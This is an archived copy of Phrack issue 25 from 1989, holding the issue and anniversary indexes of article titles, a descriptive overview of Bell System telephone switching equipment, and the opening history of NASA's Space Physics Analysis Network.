Phrack #25

EDB-ID:

42836

CVE:

N/A

Author:

phrack

Type:

papers

Platform:

Magazine

Published:

1989-03-29

                                ==Phrack Inc.==

                     Volume Three, Issue 25, File 1 of 11

                    Phrack Inc. Newsletter Issue XXV Index
                    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                                March 29, 1989

     Welcome to Phrack Inc. Issue 25 -- The beginning of Volume Three of the
Phrack Inc. Newsletter.  We have been around since November 17, 1985 and we're
proud to be still going strong.

     In this issue, we feature two really decent articles that deal with Unix
and a special index file that chronicles all 25 issues of Phrack Inc. to date.
Special thanks for help in the compilation of this file goes to Prime Suspect,
Red Knight, and Hatchet Molly.  Also, more details concerning SummerCon '89
appear in Phrack World News XXV and again, further information will be released
as it develops.  We hope you enjoy it!

     As always, we ask that anyone with network access drop us a line to either
our Bitnet accounts or our Internet addresses...

               Taran King                        Knight Lightning
          C488869@UMCVMB.BITNET                C483307@UMCVMB.BITNET
       C488869@UMCVMB.MISSOURI.EDU          C483307@UMCVMB.MISSOURI.EDU
_______________________________________________________________________________

Table of Contents:

1.  Phrack Inc. XXV Index by Taran King and Knight Lightning
2.  25th Anniversary Index by Knight Lightning, Taran King, and other friends
3.  Bell Network Switching Systems by Taran King
4.  SPAN:  Space Physics Analysis Network by Knight Lightning
5.  Unix Cracking Tips by Dark OverLord
6.  Hiding Out Under Unix by Black Tie Affair
7.  The Blue Box And Ma Bell by The Noid
8.  Hacking:  What's Legal And What's Not by Hatchet Molly
9.  Phrack World News XXV/Part 1 by Knight Lightning
10. Phrack World News XXV/Part 2 by Knight Lightning
11. Phrack World News XXV/Part 3 by Knight Lightning


--------------------------------------------------------------------------------


                                ==Phrack Inc.==

                     Volume Three, Issue 25, File 2 of 11

                            Phrack Inc. Newsletter
                         25th Issue Anniversary Index

                   From November 17, 1985 to March 29, 1989

                      By Knight Lightning and Taran King

                               Special Thanks To

                  Hatchet Molly / Prime Suspect / Red Knight


Phrack 1 (November 17, 1985)

1.  Introduction to Phrack Inc. Issue 1 by Taran King
2.  SAM Security Article by Spitfire Hacker
3.  Boot Tracing on Apple by Cheap Shades
4.  The Fone Phreak's Revenge by Iron Soldier
5.  MCI International Cards by Knight Lightning
6.  How to Pick Master Locks by Gin Fizz and Ninja NYC
7.  How to Make an Acetylene Balloon Bomb by The Clashmaster
8.  School/College Computer Dial-Ups by Phantom Phreaker


Phrack 2 (January 5, 1986)

1.  Phrack Inc. Issue 2 Index by Taran King
2.  Prevention of the Billing Office Blues by Forest Ranger
3.  Homemade Guns by Man-Tooth
4.  Blowguns by The Pyro
5.  TAC Dialups by Phantom Phreaker
6.  Universal Information Services via ISDN by Taran King
7.  MCI Overview by Knight Lightning
8.  Hacking RSTS by Data Line
9.  Phreak World News by Knight Lightning


Phrack 3

1.  Phrack Inc. Issue 3 Index by Cheap Shades
2.  Rolm Systems written by Monty Python
3.  Making Shell Bombs by Man-Tooth
4.  Signalling Systems Around the World by Data Line
5.  Private Audience by Overlord
6.  4-Tel Systems by Phantom Phreaker
7.  Eavesdropping by Circle Lord
8.  Building a Shock Box by Circle Lord
9.  Introduction to PBX's by Knight Lightning
10. Phreak World News II by Knight Lightning


Phrack 4

1.  Pro-Phile I on Crimson Death by Taran King
2.  Ringback Codes for the 314 NPA (Incomplete) by Data Line
3.  False Identification by Forest Ranger
4.  Profile on MAX Long Distance Service by Phantom Phreaker
5.  Breaching and Clearing Obstacles by Taran King
6.  Crashing DEC-10's by The Mentor
7.  Centrex Renaissance by Jester Sluggo
8.  The Tried and True Home Production Method for Speed by The Leftist
9.  Phrack World News Issue 3 Part 1 by Knight Lightning
10. Phrack World News Issue 3 Part 2 by Knight Lightning
11. Phrack World News Issue 3 Part 3 by Knight Lightning


Phrack 5

1.  Phrack V Intro by Taran King
2.  Phrack Pro-Phile of Broadway Hacker by Taran King
3.  Hacking DEC's by Carrier Culprit
4.  Hand to Hand Combat by Bad Boy in Black
5.  DMS-100 by Knight Lightning
6.  Bolt Bombs by The Leftist
7.  Wide Area Networks Part 1 by Jester Sluggo
8.  Radio Hacking by The Seker
9.  Mobile Telephone Communications by Phantom Phreaker
10. Phrack World News IV Part 1 by Knight Lightning
11. Phrack World News IV Part 2 by Knight Lightning
12. Phrack World News IV Part 3 by Knight Lightning


Phrack 6

1.  Index by Taran King
2.  Pro-Phile on Groups by Knight Lightning
3.  The Technical Revolution by Dr. Crash
4.  Fun with Lighters by The Leftist
5.  Nasty Unix Tricks by Shooting Shark
6.  Smoke Bombs by Alpine Kracker
7.  Cellular Telephones by High Evolutionary
8.  Wide Area Networks Part 2 by Jester Sluggo
9.  Phrack World News Part 1 by Knight Lightning
10. Phrack World News Part 2 by Knight Lightning
11. Phrack World News Part 3 by Knight Lightning
12. Phrack World News Part 4 by Knight Lightning
13. Phrack World News Part 5 by Knight Lightning


Phrack 7

1.  Intro/Index by Taran King
2.  Phrack Pro-Phile of Scan Man by Taran King
3.  Hacker's Manifesto by The Mentor
4.  Hacking Chilton's Credimatic by Ryche
5.  Hacking RSTS Part 1 by The Seker
6.  How to Make TNT by The Radical Rocker
7.  Trojan Horses in Unix by Shooting Shark
8.  Phrack World News VI Part 1 by Knight Lightning
9.  Phrack World News VI Part 2 by Knight Lightning
10. Phrack World News VI Part 3 by Knight Lightning


Phrack 8

1.  Phrack Inc. Index by Taran King
2.  Phrack Pro-Phile V on Tuc by Taran King
3.  City-Wide Centrex by The Executioner
4.  The Integrated Services Digital Network by Dr. Doom
5.  The Art of Junction Box Modeming by Mad Hacker 616
6.  Compuserve Info by Morgoth and Lotus
7.  Fun with Automatic Tellers by The Mentor
8.  Phrack World News VII Part 1 by Knight Lightning
9.  Phrack World News VII Part 2 by Knight Lightning


Phrack 9

1.  Introduction to Phrack Inc. Issue Nine by Taran King
2.  Phrack Pro-Phile on The Nightstalker by Taran King
3.  Fun With the Centagram VMS Network by Oryan Quest
4.  Programming RSTS/E File2:  Editors by Solid State
5.  Inside Dialog by Ctrl C
6.  Plant Measurement by The Executioner
7.  Multi-User Chat Program for DEC-10's by TTY-Man and The Mentor
8.  Introduction to Videoconferencing by Knight Lightning
9.  Loop Maintenance Operations System by Phantom Phreaker and Doom Prophet
10. Phrack World News VIII by Knight Lightning


Phrack 10

1.  Introduction to Phrack 10 by Taran King
2.  Pro-Phile on Dave Starr by Taran King
3.  The TMC Primer by Cap'n Crax
4.  A Beginner's Guide to the IBM VM/370 by Elric of Imrryr
5.  Circuit Switched Digital Capability by The Executioner
6.  Hacking Primos Part I by Evil Jay
7.  Automatic Number Identification by Phantom Phreaker and Doom Prophet
8.  Phrack World News IX Part 1 by Knight Lightning
9.  Phrack World News IX Part 2 by Knight Lightning


Phrack 11

1.  Index to Phrack 11 by Taran King
2.  Phrack Pro-Phile VIII on Wizard of Arpanet by Taran King
3.  PACT:  Prefix Access Code Translator by The Executioner
4.  Hacking Voice Mail Systems by Black Knight from 713
5.  Simple Data Encryption or Digital Electronics 101 by The Leftist
6.  AIS - Automatic Intercept System by Taran King
7.  Hacking Primos I, I, III by Evil Jay
8.  Telephone Signalling Methods by Doom Prophet
9.  Cellular Spoofing By Electronic Serial Numbers donated by Amadeus
10. Busy Line Verification by Phantom Phreaker
11. Phrack World News X by Knight Lightning
12. Phrack World News XI by Knight Lightning


Phrack 12

1.  Index of Phrack 12 by Taran King
2.  Pro-Phile IX on Agrajag The Prolonged by Taran King
3.  Preview to Phrack 13-The Life & Times of The Executioner
4.  Understanding the Digital Multiplexing System (DMS) by Control C
5.  The Total Network Data System by Doom Prophet
6.  CSDC II - Hardware Requirements by The Executioner
7.  Hacking:  OSL Systems by Evil Jay
8.  Busy Line Verification Part II by Phantom Phreaker
9.  Scan Man's Rebuttal to Phrack World News
10. Phrack World News XII Part 1 by Knight Lightning
11. Phrack World News XII Part 2 by Knight Lightning


Phrack 13 (April 1, 1987)

1.  Phrack 13 Index by Taran King
2.  Real Phreaker's Guide Vol. 2 by Taran King and Knight Lightning
3.  How to Fuck Up the World - A Parody by Thomas Covenant
4.  How to Build a Paisley Box by Thomas Covenant and Double Helix
5.  Phreaks In Verse by Sir Francis Drake
6.  R.A.G. - Rodents Are Gay by Evil Jay
7.  Are You A Phone Geek?  by Doom Prophet
8.  Computerists Underground News Tabloid - CUNT by Crimson Death
9.  RAGS - The Best of Sexy Exy
10. Phrack World News XIII by Knight Lightning



Phrack 14

1.  Phrack 14 Index by Knight Lightning
2.  Phrack Pro-Phile X on Terminus by Taran King
3.  The Conscience of a Hacker (Reprint) by The Mentor
4.  REMOBS:  The Reality of The Myth by Taran King
5.  Understanding DMS Part II by Control C
6.  TRW Business Terminology by Control C
7.  Phrack World News Special Edition 1 by Knight Lightning
8.  Phrack World News Issue XIV Part 1 by Knight Lightning
9.  Phrack World News Issue XIV Part 2 by Knight Lightning


Phrack 15

1.  Phrack XV Intro by Shooting Shark
2.  More Stupid Unix Tricks by Shooting Shark
3.  Making Free Local Payfone Calls by Killer Smurf
4.  Advanced Carding XIV by The Disk Jockey
5.  Gelled Flame Fuels by Elric of Imrryr
6.  Phrack World News XV/Part 1 by Knight Lightning
7.  Phrack World News XV/Part 2 by Knight Lightning
8.  Phrack World News XV/Part 3 by Sir Francis Drake


Phrack 16

1.  Phrack 16 Intro by Elric of Imrryr
2.  BELLCORE Information by The Mad Phone-Man
3.  A Hacker's Guide to Primos:  Part 1 by Cosmos Kid
4.  Hacking GTN by The Kurgan
5.  Credit Card Laws Laws by Tom Brokow
6.  Tapping Telephone Lines by Agent Steal
7.  Reading Trans-Union Credit Reports by The Disk Jockey
8.  Phrack World News XXVI/Part 1 by Shooting Shark
9.  Phrack World News XXVI/Part 2 by The Mad Phone-Man
10. Phrack World News XXVI/Part 3 by The Mad Phone-Man
11. Phrack World News XXVI/Part 4 by Shooting Shark
12. Phrack World News XXVI/Part 5 by The $muggler


Phrack 17 (April 7, 1988)

1.  Phrack XVII Introduction by Shooting Shark
2.  Dun & Bradstreet Report on AT&T by Elric of Imrryr
3.  Dun & Bradstreet Report on Pacific Telesis by Elric of Imrryr
4.  Nitrogen-Trioxide Explosive by Signal Substain
5.  How to Hack Cyber Systems by Grey Sorcerer
6.  How to Hack HP2000's by Grey Sorcerer
7.  Accessing Government Computers by The Sorceress
8.  Dial-Back Modem Security by Elric of Imrryr
9.  Data Tapping Made Easy by Elric of Imrryr
10. Phrack World News XVII/Part 1 by Sir Francis Drake
11. Phrack World News XVII/Part 2 by The $muggler
12. Phrack World News XVII/Part 3 by The Sorceress


Phrack 18 (June 7, 1988)

1.  Index of Phrack 18 by Crinsom Death
2.  Pro-Phile XI on Ax Murderer by Crimson Death
3.  An Introduction to Packet Switched Netwoks by Epsilon
4.  Primos: Primenet, RJE, DPTX by Magic Hasan
5.  Hacking CDC's Cyber by Phrozen Ghost
6.  Unix for the Moderate by URvile
7.  Unix System Security Issues by Jester Sluggo
8.  Loop Maintenance Operating System by Control C
9.  A Few Thinigs About Networks by Prime Suspect
10. Phrack World News XVIII Part I by Epsilon
11. Phrack World News XVIII Part II by Epsilon


Phrack 19

1.  Phrack Inc. Index by Crimson Death
2.  DCL Utilities for VMS Hackers by The Mentor
3.  Digital Multiplexing Systems (Part 2) by Control C
4.  Social Security Number Formatting by Shooting Shark
5.  Facility Assignment & Control Systems by Phantom Phreaker
6.  Phrack Editorial on Microbashing by The Nightstalker
7.  Phrack World News XVIV/Part 1 by Knight Lightning
8.  Phrack World News XVIV/Part 2 by Epsilon


Phrack 20 (October 12, 1988)

1.  Phrack XX Index by Taran King and Knight Lightning
2.  Phrack Pro-Phile on Taran King
3.  Timeline Featuring Taran King, Knight Lightning, and Cheap Shades
4.  Welcome To Metal Shop Private by TK, KL, and CS
5.  Metal/General Discussion
6.  Phrack Inc./Gossip
7.  Phreak/Hack Sub
8.  Social Engineering
9.  New Users
10. The Royal Court
11. Acronyms
12. Phrack World News XX Featuring SummerCon '88 by Knight Lightning


Phrack 21 (November 4, 1988)

1.  Index by Taran King and Knight Lightning
2.  Phrack Pro-Phile on Modem Master by Taran King
3.  Shadows Of A Future Past (Part 1 of the Vicious Circle Trilogy) by KL
4.  The Tele-Pages by Jester Sluggo
5.  Satellite Communications by Scott Holiday
6.  Network Management Center by Knight Lightning and Taran King
7.  Non-Published Numbers by Patrick Townsend
8.  Blocking Of Long Distance Calls by Jim Schmickley
9.  Phrack World News Special Edition II by Hatchet Molly and Knight Lightning
10. Phrack World News Issue XXI Part 1 by Knight Lightning and Epsilon
11. Phrack World News Issue XXI Part 2 by Knight Lightning and Epsilon


Phrack 22 (December 23, 1988)

1.  Index by Taran King and Knight Lightning
2.  Phrack Pro-Phile on Karl Marx by Taran King & Knight Lightning
3.  The Judas Contract (Part 2 of the Vicious Circle Trilogy) by KL
4.  A Novice's Guide To Hacking (1989 Edition) by The Mentor
5.  An Indepth Guide In Hacking Unix by Red Knight
6.  Yet Another File On Hacking Unix by >Unknown User<
7.  Computer Hackers Follow A Guttman-Like Progression by Richard C. Hollinger
8.  A Report On The InterNet Worm by Bob Page
9.  Phrack World News Issue XXII/Part 1 by Knight Lightning and Taran King
10. Phrack World News Issue XXII/Part 2 by Knight Lightning and Taran King
11. Phrack World News Issue XXII/Part 3 by Knight Lightning and Taran King
12. Phrack World News Issue XXII/Part 4 by Knight Lightning and Taran King


Phrack 23 (January 28, 1989)

1.  Phrack Inc. XXIII Index by Knight Lightning & Taran King
2.  Phrack Prophile XXIII Featuring The Mentor by Taran King
3.  Subdivisions (Part 3 of The Vicious Circle Trilogy) by Knight Lightning
4.  Utopia; Chapter One of FTSaga by Knight Lightning
5.  Foundations On The Horizon; Chapter Two of FTSaga by Knight Lightning
6.  Future Transcendent Saga Index A from the Bitnet Services Library
7.  Future Transcendent Saga Index B from the Bitnet Services Library
8.  Getting Serious About VMS Hacking by VAXBusters International
9.  Can You Find Out If Your Telephone Is Tapped? by Fred P. Graham (& VaxCat)
10. Big Brother Online by Thumpr (Special Thanks to Hatchet Molly)
11. Phrack World News XXIII/Part 1 By Knight Lightning
12. Phrack World News XXIII/Part 2 by Knight Lightning


Phrack 24 (February 25, 1989)

1.  Phrack Inc. XXIV Index by Taran King and Knight Lightning
2.  Phrack Prophile XXIV Featuring Chanda Leir by Taran King
3.  Limbo To Infinty; Chapter Three of FTSaga by Knight Lightning
4.  Frontiers; Chapter Four of FTSaga by Knight Lightning
5.  Control Office Administration Of Enhanced 911 Service by The Eavesdropper
6.  Glossary Terminology For Enhanced 911 Service by The Eavesdropper
7.  Advanced Bitnet Procedures by VAXBusters International
8.  Special Area Codes by >Unknown User<
9.  Lifting Ma Bell's Cloak Of Secrecy by VaxCat
10. Network Progression by Dedicated Link
11. Phrack World News XXIV/Part 1 by Knight Lightning
12. Phrack World News XXIV/Part 2 by Knight Lightning
13. Phrack World News XXIV/Part 3 by Knight Lightning


Phrack 25 (March 29, 1989)

1.  Phrack Inc. XXV Index by Taran King and Knight Lightning
2.  25th Anniversary Index by Knight Lightning, Taran King, and other friends
3.  Bell Network Switching Systems by Taran King
4.  SPAN:  Space Physics Analysis Network by Knight Lightning
5.  Unix Cracking Tips by Dark OverLord
6.  Hiding Out Under Unix by Black Tie Affair
7.  The Blue Box And Ma Bell by The Noid
8.  Hacking:  What's Legal And What's Not by Hatchet Molly
9.  Phrack World News XXV/Part 1 by Knight Lightning
10. Phrack World News XXV/Part 2 by Knight Lightning
11. Phrack World News XXV/Part 3 by Knight Lightning
_______________________________________________________________________________


--------------------------------------------------------------------------------


                                ==Phrack Inc.==

                     Volume Three, Issue 25, File 3 of 11

                        Bell Network Switching Systems

                       An Informational Definitive File

                                 By Taran King

                                March 14, 1989


         Throughout my many conversations with what many consider the "elite"
of the community, I have come to realize that even the highest up on the
hierarchical map do not know all of the little differences and specificities of
the switching systems that the BOCs use throughout the nation.  This file was
written so that people could understand the differences between their switch
and those switches in areas where they have friends or that they pass through.

         There are two broad categories that switches can be separated into:
local and tandem.  Local offices connect customer lines to each other for
local calls and connect lines to trunks for interoffice calls.  Tandem
switching is subdivided into two categories:  local tandem offices and toll
offices.  Local toll offices connect trunks to trunks within a metropolitan
area whereas toll offices connect trunks to trunks from the toll network
portion (class 1 to 4) of the hierarchical Public Switched Telephone Network
(PSTN).

         Because of the convenience of having direct interface with customer
lines, local switching has built in functions needed to provide exchange
services such as local calling, custom calling features, Touch-Tone service,
E911 service, and exchange business services (like Centrex, ESSX-1, and
ESS-ACD.  Centrex is a service for customers with many stations that is
provided out of the Central Office.  ESSX-1 service limits the number of
simultaneous incoming and outgoing calls and the number of simultaneous
intragroup calls to software sizes specified by the customer.  ESS-ACD is the
exchange service equivalent to Automatic Call Distribution except the call
distribution takes place in a Centrex-functioning portion of the electronic
switch.)

         Geographic centralization of the tandem office allows efficiency in
providing centralized billing and network services.

         Automatic switching was formally installed by the Bell System in 1919
and although there are many replacements that update old and less preferable
services, many older offices still exist in various parts of the country.


ELECTROMECHANICAL SWITCHING SYSTEMS

         The Step By Step (SXS) switching system, also known as the Strowger
system, was the earliest switching system.  Invented by A. B. Strowger in
1889, it is currently used in rural and suburban areas around the country as
well as some metropolitan areas which were small when the switch was
installed.  The term "Step By Step" describes both the manner in which the
switching network path is established and the way in which each of the
switches in the path operates.  They combine vertical stepping and a
horizontal rotary stepping motion to find the number dialed through pulse.
The drawbacks of the SXS system include not being able to have Touch Tone
calling or alternative routing without adding expensive equipment to the
office and also that the customer's telephone number is determined by the
physical termination/location of the line or connector on the system.  The
line cannot be moved without changing the telephone number.  The other
drawback is the high maintenance cost.  These reasons, among others, have led
to a drop in the amount of SXS systems seen around the country.

         The No. 1 Crossbar (XBAR) was developed for use in metropolitan
areas.  The XBAR system uses horizontal and vertical bars to select the
contacts.  There are five selecting bars mounted horizontally across the front
of each XBAR switch.  Each selecting bar can choose either of two horizontal
rows of contacts.  The five horizontal selecting bars can therefore select ten
horizontal rows of contacts.  There are ten or twenty vertical units mounted
on the switch and each vertical unit forms one vertical path.  Each switch has
either 100 or 200 sets of crosspoints/contacts depending on the number of
vertical units.

         The No. 5 Crossbar was developed to fill the need for a switching
system that would be more productive in suburban residential areas or smaller
cities.  The No. 5 XBAR also included automatic recording of call details for
billing purposes to allow for DDD (Direct Distance Dialing).  The No. 5 XBAR
is separated into 2 parts:  the switching network where all the talking paths
are established and the common-control equipment which sets up the talking
paths.  Various improvements have been made on the No. 5 XBAR over the years
such as centralized automatic message accounting, line link pulsing to
facilitate DID (Direct Inward Dialing) to stations served by a dial PBX
(Private Branch Exchange), international DDD, Centrex service, and ACD
capability.  The No. 5 Electronic Translator System (ETS) was also a
development which used software instead of wire cross-connections to provide
line, trunk, and routing translations as well as storing billing information
for transmissions via data link to a centralized billing collection system.

         The No. 4 Crossbar is a common-control system designed for toll
service with crossbar switches making up its switching network.  The No. 4A
XBAR system was designed for metropolitan areas and added the ability to have
CAMA (Centralized Automatic Message Accounting) as well as foreign-area
translation, automatic alternate routing, and address digit manipulation
capabilities (which is converting the incoming address to a different address
for route control in subsequent offices, deleting digits, and prefixing new
digits if needed).  The No. 4A ETS replaced the card translator (which was
used for translation via phototransistors) and allowed billing and route
translation functions to be changed by teletypewriter input as it was a
stored-program control processor.  CCIS (Common Channel Interoffice
Signaling) was added to the No. 4A XBAR in 1976 for more efficient signaling
between toll offices among other things.


ELECTRONIC SWITCHING SYSTEMS

         The Electronic Switching Systems were made possible by the invention
of the transistor.  They apply the basic concepts of an electronic data
processor, operating under the direction of a stored-program control, and
high-speed switching networks.  The stored-program control allows system
designs the necessary flexibility to design new features and install them
easily.  The SPC controls the sequencing of operations required to establish a
call.  It can control a line or trunk circuit according to its application.

         The first electronic switching trial took place in Morris, IL in
1960.  The first application of electronic local switching in the Bell System
took place in May of 1965 with the cutover of the first 1ESS switch in
Succasunna, NJ.

         The 1ESS switching system was designed for areas where large numbers
of lines and lines with heavy traffic are served.  It generally serves between
10,000 and 65,000 lines.  The memory of the 1ESS is generally read only memory
(ROM) so that neither software or hardware malfunctions can alter the
information content.

         The 1A Processor was introduced in 1976 in the first 1AESS switch.
It was designed for local switching applications to be implemented into a
working 1ESS switch.  It allowed the switching capacity to be doubled from
the old 1ESS switches also.  The 1A Processor uses both ROM and RAM (Random
Access Memory).  Magnetic tape units in the 1A Processor allow for system
reinitialization as well as detailed call billing functions.

         Both the 1ESS and the 1AESS switches use the same peripheral
equipment which allows for easy transition.  Programs in both switches control
routine tests, diagnose troubles, detect and report faults and troubles, and
control emergency actions to ensure satisfactory operation.  Both switches
offer the standard custom calling features as well as business features like
Centrex, ESS-ACD, Enhanced Private Switched Communications Service or ETS
(Electronic Tandem Switching).

         The 2ESS was designed to extend electronic switching into suburban
regions but doing so economically, meeting the need for 2,000 to 10,000 line
offices.  It has a call capacity of 19,000 with a maximum of 24,000 terminals
per system.  One of the differences between the 1ESS and the 2ESS is that in
the 2ESS, lines and trunks terminate on the same side of the network, which is
called a folded network.  There is no need for separate line and trunk link
networks as in the 1ESS.  Also, the network architecture was designed to
interface with customer lines carrying lighter traffic, the features were
oriented toward residential rather than business lines, and the processor was
smaller and less expensive.

         In 1976, the first 2BESS switch was introduced in Acworth, GA.  The
2BESS switch is similar to the 1AESS in that it has something added into the
switch.  In this case, though, it is the 3ACC (3A Central Control), which is
in the place of the processor.  The 3ACC doubles the call capacity originally
available in the 2ESS switch by combining integrated circuit design with
semiconductor memory stores.  It also requires one-fifth of the floor space
and one-sixth of the power and air conditioning that the 2ESS central
processor requires.  The 3ACC is a self-checking, microprogram-controlled
processor capable of high-speed serial communication.  Resident programs in
the 3ACC are hardware write-protected, but non-resident programs like
maintenance, recent change (RC), and back-up for translations or residential
programs are stored on a tape cartridge.

         Also in 1976, the need for switching in rural areas serving fewer
than 4500 lines resulted in the introduction of the 3ESS switch.  The 3ESS
switching equipment is the smallest Western Electric space-division,
centralized electronic switching system which serves 2,000 to 4,500 lines.
The 3ACC is used as the processor in the 3ESS, which was designed to meet the
needs of a typical Community Dial Office (CDO).  It, too, is a folded network
like the 2ESS and 2BESS.  The switch was designed for unattended operation,
implementing extensive maintenance programs as well as remote SCCS (Switching
Control Center System) maintenance capabilities.

         The 4ESS switching equipment is a large-capacity tandem system for
trunk-to-trunk interconnection.  It forms the heart of the Stored-Program
Control (SPC) network that uses CCIS (Common-Channel Interoffice Signaling)
yet still supports Multi-Frequency (MF) and Dial-Pulse (DP) signaling.  The
SPC network allows for features such as the Mass Announcement System (MAS)
(which is where we find all of our entertaining 900 Dial-It numbers) and
WATS (Wide-Area Telecommunications Services) screening/routing.  The 4ESS also
provides international gateway functions.  It uses a 1A Processor as its main
processor, which, along with its use of core memories and higher speed logic,
is about five times as fast as the 1ESS processor.  The 4ESS software
structure is based on a centralized development process using three languages:
a low-level assembly language, the intermediate language called EPL (ESS
Programming Language), and a high level language called EPLX.  The assembly
language takes care of real-time functions like call processing while
measurements and administrative functions frequently are programmed in EPL.
Some maintenance programs and audits which are not as frequently run are in
EPLX.  Up to six 4ESS switches can be remotely administered and maintained
from centralized work centers which means that very few functions need to be
performed at the site of the switch itself.

         In March of 1982, the 5ESS switch first went into operation.  It is a
digital time-division electronic switching system designed for modular growth
to accommodate local offices ranging from 1,000 to 100,000 lines.  It was
designed to replace remaining electromechanical switching systems in rural,
suburban, and urban areas economically.  Features of new generic versions of
the program allowed multimodule configuration and local/toll features for
combined class 4 and class 5 operation.  The 5ESS administrative module
processor consists of two 3B20s.  The communications module consists of a
message switch and a TMS (Time-Multiplexed Switch), which is used to connect
voice channels in one interface module to voice channels in another interface
module as well as for data messages between the administrative modules and
interface modules and also is used for data messages between interface
modules.  The interface module can host analog line/trunk units, digital
line/trunk units, digital carrier line units, digital service circuit units,
or metallic service units in addition to miscellaneous test and access units.
There are 2 software divisions in the 5ESS.  The portion in the administrative
module processor is responsible for officewide functions such as the human
interfaces, routing, charging, feature translations, switch maintenance, and
data storage and backup.  The portion in the interface module is responsible
for the standard call-processing functions associated with the lines and
trunks terminating on that interface module.  Most software is written in C
and has a modular structure to afford easy expansion and maintenance.

         The last thing to mention here are Remote Switching Systems (RSS) and
Remote Switching Modules (RSM).  The No. 10A RSS is designed to act as an
extension of a 1ESS, 1AESS, or 2BESS switching equipment host and is
controlled remotely by the host over a pair of dedicated data links.  It
shares the processor capabilities of these nearby ESS switches and uses a
microprocessor for certain control functions under the direction of the host
central processor.  The RSS is capable of stand-alone functioning if the links
between it and the host are severed somehow.  If this occurs, though, custom
calling, billing, traffic measurements, etc. are unavailable -- only basic
service on intra-RSS calls is allowed.  The No. 5A RSM can be located up to
100 miles from the 5ESS host and can terminate a maximum of 4000 lines with a
single interface module.  Several RSMs can be interconnected to serve remote
offices as large as 16,000 lines.  It is a standard 5ESS system interface
module with the capability for stand-alone switching capability if the
host-remote link fails.  One difference from the RSS of the RSM is the ability
to use direct trunking, whereas the RSS requires that all interoffice calls
pass through the host switch.

         Of course, there are many other switches out there, but these are the
basic Western Electric switches provided for the Bell System.  The following
is a time-table to summarize the occurrences of SPC switching systems that have
been used by BOCs and AT&T:

1965    The 1ESS used for local metropolitan allows 65,000 lines and 16,000
        trunks.
1968    The 1ESS expands for local metropolitan and local tandem.
1970    The 2ESS used for local suburban has 30,000 lines and trunks together.
1974    The 1ESS allows 2-wire toll switching.
1976    The 4ESS uses large 4-wire toll for use of 100,000 trunks.
1976    The 1AESS for large metropolitan local use has 90,000 lines and 32,000
        trunks
1976    The 2BESS for local suburban use has 30,000 lines and trunks together.
1976    The 3ESS for local rural use has 5,800 lines and trunks together.
1977    The 1AESS using 4-wire toll.
1979    The 1AESS has local, tandem, and toll capability.
1979    The 10A RSS is for local small rural areas with 2,000 lines.
1982    The 5ESS for local rural to large metropolitan areas with tandem and
        toll capabilities has from 150,000 lines and 50,000 trunks to 0 lines
        and 60,000 trunks.
______________________________________________________________________________


--------------------------------------------------------------------------------


                                ==Phrack Inc.==

                     Volume Three, Issue 25, File 4 of 11

              =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
              =-=                                             =-=
              =-=                   S P A N                   =-=
              =-=                                             =-=
              =-=       Space Physics Analysis Network        =-=
              =-=                                             =-=
              =-=     Brought To You by Knight Lightning      =-=
              =-=                                             =-=
              =-=               March 15, 1989                =-=
              =-=                                             =-=
              =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=


Preface
~~~~~~~
In the spirit of the Future Transcendent Saga, I continue to bring forth
information about the wide area networks.  The information presented in this
file is based primarily on research.  I do not have direct access to SPAN other
than through TCP/IP links, but this file should provide you with general
information with which to properly use the Space Physics Analysis Network.


Introduction
~~~~~~~~~~~~
The Space Physics Analysis Network (SPAN) has rapidly evolved into a broadly
based network for cooperative, interdisciplinary and correlative space and
Earth science data analysis that is spaceflight mission independent.  The
disciplines supported by SPAN originally were Solar-Terrestrial and
Interplanetary Physics.  This support has been expanded to include Planetary,
Astrophysics, Atmospherics, Oceans, Climate, and Earth Science.

SPAN utilizes up-to-date hardware and software for computer-to-computer
communications allowing binary file transfer, mail, and remote log-on
capability to over 1200 space and Earth science computer systems in the United
States, Europe, and Canada.  SPAN has been reconfigured to take maximum
advantage of NASA's Program Support Communication Network (PSCN) high speed
backbone highway that has been established between its field centers.  In
addition to the computer-to-computer communications which utilizes DECnet, SPAN
provides gateways to the NASA Packet Switched System (NPSS), GTE/Telenet,
JANET, ARPANET, BITNET and CSNET.  A major extension for SPAN using the TCP/IP
suite of protocols has also been developed.

This file provides basic information on SPAN, it's history, architecture, and
present guidelines for it's use.  It is anticipated that SPAN will continue to
grow very rapidly over the next few years.  Several existing wide-area DECnet
networks have joined with SPAN to provide a uniform internetwork structure and
more will follow.


History Of The SPAN and the Data Systems Users Working Group (DSUWG)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
A considerable evolution has occurred in the past two decades in the way
scientific research in all disciplines is done.  This is particularly true of
NASA where early research was centered around exploratory missions in which
measurements from individual scientific instruments could be meaningfully
employed to advance the state of knowledge.  As these scientific disciplines
have progressed, a much more profound and interrelated set of questions is
being posed by researchers.  The result is that present-day investigations are
generally much more complex.  For example, within the space science community
large volumes of data are acquired from multiple sensors on individual
spacecraft or ground-based systems and, quite often, data are needed from many
institutions scattered across the country in order to address particular
physical problems.  It is clear that scientific research during the late 1980s
and beyond will be devoted to intense multi-disciplinary studies aimed at
exploring very complex physical questions.  In general, the need for
researchers to exchange data and technical information in a timely and
interactive way has been increasing.

The problems of data exchange are exacerbated by the lack of standards for
scientific data bases.  The net result is that, at present, most researchers
recognize the value of multi-disciplinary studies, but the cost in time and
effort is devastating to their research efforts.  This trend is antithetical to
the needs of the NASA research community.  SPAN is only one of many research
networks that are just beginning to fill a need for access to remote
capabilities that are not obtainable locally.

In May of 1980 the Space Plasma Physics Branch of the Office of Space Science
of NASA Headquarters funded a project at Marshall Space Flight Center (MSFC) to
investigate ways of performing correlative space plasma research nationwide on
a daily basis.  As a first step, a user group was formed called the Data
Systems Users Working Group (DSUWG) to provide the space science community
interaction and direction in the project.  After the first meeting of the DSUWG
in September 1980, it was decided that the approach would be to design, build,
and operate a spacecraft mission independent science network as a test case.
In addition, the construction of the system would be designed to use existing
data analysis computer systems at space physics institutions and to take full
advantage of "off-the-shelf" software and hardware.

The Space Physics Analysis Network (SPAN) first became operational in December
1981 with three major nodes:

o  University of Texas at Dallas
o  Utah State University
o  MSFC

Since that time it has grown rapidly.  Once operational, SPAN immediately
started to facilitate space-data analysis by providing electronic mail,
document browsing, access to distributed data bases, facilities for numeric and
graphic data transfer, access to Class VI machines, and entry to gateways for
other networks.

